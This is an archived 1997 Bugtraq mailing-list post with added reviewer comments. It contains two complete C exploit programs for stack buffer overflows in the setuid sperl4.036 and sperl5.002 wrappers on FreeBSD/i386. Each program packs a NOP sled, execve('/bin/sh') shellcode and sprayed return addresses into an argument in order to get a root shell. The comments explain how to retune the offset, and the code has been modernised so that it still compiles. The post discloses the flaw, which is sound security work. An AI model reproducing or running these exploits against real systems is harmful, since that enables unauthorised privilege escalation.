Bugtraq mailing list archives
Exploits for FreeBSD sperl4.036 & sperl5.00x
From: deliver () FREE POLBOX PL (Deliver)
Date: Mon, 21 Apr 1997 16:34:41 PDT
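/*
 * Mail body (wording tidied, content unchanged):
 *
 *   If somebody wants to test the perl5.00X or perl4.036 buffer-overflow
 *   exploits, here are two for FreeBSD. The first works on perl4.036 and the
 *   second on perl5.002. With a small modification of the OFFSET value you can
 *   overflow all versions up to perl5.003.
 *
 * Reviewer notes (apply to both listings below):
 *   - Two separate source files follow, delimited by the original "cut" marks.
 *     They cannot be compiled as one translation unit: both define main, buf
 *     and get_esp.
 *   - Target: the setuid perl wrappers /usr/bin/sperl4.036 and
 *     /usr/bin/sperl5.002 on FreeBSD/i386. The whole payload is handed to
 *     sperl as its single argument; the exploit assumes sperl copies it into a
 *     fixed-size stack buffer so that the repeated guessed address overwrites
 *     a saved return address and control lands in the NOP sled in front of the
 *     shellcode. The mail does not name the vulnerable routine.
 *   - The two listings are the same program. They differ only in OFFSET, in a
 *     one-byte shift of the address slots and sled (the "+1" in the first),
 *     and in the target path.
 *   - Hygiene fixes made here, none of which change the payload bytes:
 *     <string.h> is included (memset/memcpy/strlen were implicitly declared),
 *     main has a return type, get_esp no longer falls off the end of a
 *     non-void function, the address is written with memcpy instead of a
 *     misaligned pointer store, and a failed execl is reported instead of the
 *     program exiting silently.
 *   - i386 only: the 4-byte slot stride assumes sizeof(char *) == 4. On a
 *     64-bit build the last slot would run one byte past buf.
 */

/* ------------cut------------ first file: sperl4.036 ------------cut------------ */
/************************************************************/
/* Exploit for FreeBSD sperl4.036 by OVX                     */
/************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER_SIZE 1400 /* total payload length handed to sperl as argv[1] */
#define OFFSET      600  /* guessed distance from our esp down to the sled inside sperl; retune on a miss */
#define SLED_LEN    768  /* leading 0x90 (NOP) bytes the guessed address may land in */

/*
 * Address sprayed over the payload. The original read esp with a bare
 * asm("movl %esp,%eax") and then fell off the end of a non-void function,
 * relying on eax still holding the value -- undefined behaviour that worked
 * with the gcc of the day at -O0. Immediately after the standard i386 prologue
 * (push %ebp; mov %esp,%ebp) esp equals the frame address, so
 * __builtin_frame_address(0) yields the same value without the UB. Either way
 * the value, and hence OFFSET, depends on compiler and flags; the NOP sled
 * absorbs small shifts.
 */
static char *get_esp(void)
{
    return (char *)__builtin_frame_address(0);
}

char buf[BUFFER_SIZE]; /* file scope: zero-initialised, so bytes never written are NUL */

int main(void)
{
    /*
     * FreeBSD/i386 execve("/bin/sh") shellcode, kept as a stack local as in
     * the original because main's frame size is part of the layout OFFSET was
     * tuned against. Recognisable pieces: the usual jmp/call/pop to locate
     * itself (0xeb ... 0x5e ... 0xe8), "xor %eax,%eax; mov $0x3b,%al" (0x3b
     * is evidently the execve syscall number), the "/bin/sh" string, and the
     * 0x01/0x02/0x03/0x04 filler bytes that the code appears to patch at
     * runtime so the string contains no NUL -- strlen() below must see all of
     * it. Do not edit the bytes without re-checking a disassembly.
     */
    char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
    /*
     * Loop-invariant in the original too (same frame on every call). Hoisting
     * it adds one 4-byte local to main's frame, i.e. shifts the guess by 4,
     * well inside the sled.
     */
    char *ret = get_esp() - OFFSET;
    int i;

    /*
     * Fill the payload with copies of the guessed address. The slots start at
     * offset 1 (the 5.00x version uses 0); presumably this matches how argv[1]
     * is aligned on sperl's stack -- the mail does not say. memcpy replaces
     * the original *(char **)&buf[i] store, which was misaligned for odd i.
     * The loop stops at i < 1396, so buf[1397] and buf[1398] stay NUL and the
     * argument actually passed to sperl is 1397 bytes long.
     */
    for (i = 0 + 1; i < BUFFER_SIZE - 4; i += 4)
        memcpy(&buf[i], &ret, sizeof ret);

    /* NOP sled (shifted by one as well), then the shellcode right behind it. */
    memset(buf, 0x90, SLED_LEN + 1);
    memcpy(&buf[SLED_LEN + 1], execshell, strlen(execshell));
    buf[BUFFER_SIZE - 1] = 0; /* redundant given the zero-initialised tail; kept from the original */

    /* execl() only returns on failure. */
    execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
    perror("execl /usr/bin/sperl4.036");
    return EXIT_FAILURE;
}

/* ------------cut------------ second file: sperl5.00x ------------cut------------ */
/************************************************************/
/* Exploit for FreeBSD sperl5.00X by OVX                     */
/************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER_SIZE 1400 /* total payload length handed to sperl as argv[1] */
#define OFFSET      1000 /* guessed distance from our esp down to the sled inside sperl5.002; retune on a miss */
#define SLED_LEN    768  /* leading 0x90 (NOP) bytes the guessed address may land in */

/* Same as in the 4.036 listing: frame address == esp right after the prologue. */
static char *get_esp(void)
{
    return (char *)__builtin_frame_address(0);
}

char buf[BUFFER_SIZE]; /* zero-initialised global */

int main(void)
{
    /* Byte-identical to the 4.036 listing's shellcode; see the notes there. */
    char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
    char *ret = get_esp() - OFFSET; /* hoisted; shifts the guess by 4 bytes, inside the sled */
    int i;

    /*
     * Address slots start at offset 0 here (no "+1"). The loop's last store is
     * at i == 1392, so buf[1396..1398] stay NUL and sperl receives a 1396-byte
     * argument.
     */
    for (i = 0; i < BUFFER_SIZE - 4; i += 4)
        memcpy(&buf[i], &ret, sizeof ret);

    /* NOP sled, then the shellcode. */
    memset(buf, 0x90, SLED_LEN);
    memcpy(&buf[SLED_LEN], execshell, strlen(execshell));
    buf[BUFFER_SIZE - 1] = 0; /* redundant; kept from the original */

    /* execl() only returns on failure. */
    execl("/usr/bin/sperl5.002", "/usr/bin/sperl5.002", buf, NULL);
    perror("execl /usr/bin/sperl5.002");
    return EXIT_FAILURE;
}

/* ------------cut------------ end of second file ------------cut------------ */

/*
 * PS: Pozdrowienia dla wszystkich polskich hackerow ...
 *     (Polish: "Greetings to all Polish hackers ...")
 *
 * ANY QUESTIONS ?   OVX - deliver () free polbox pl
 */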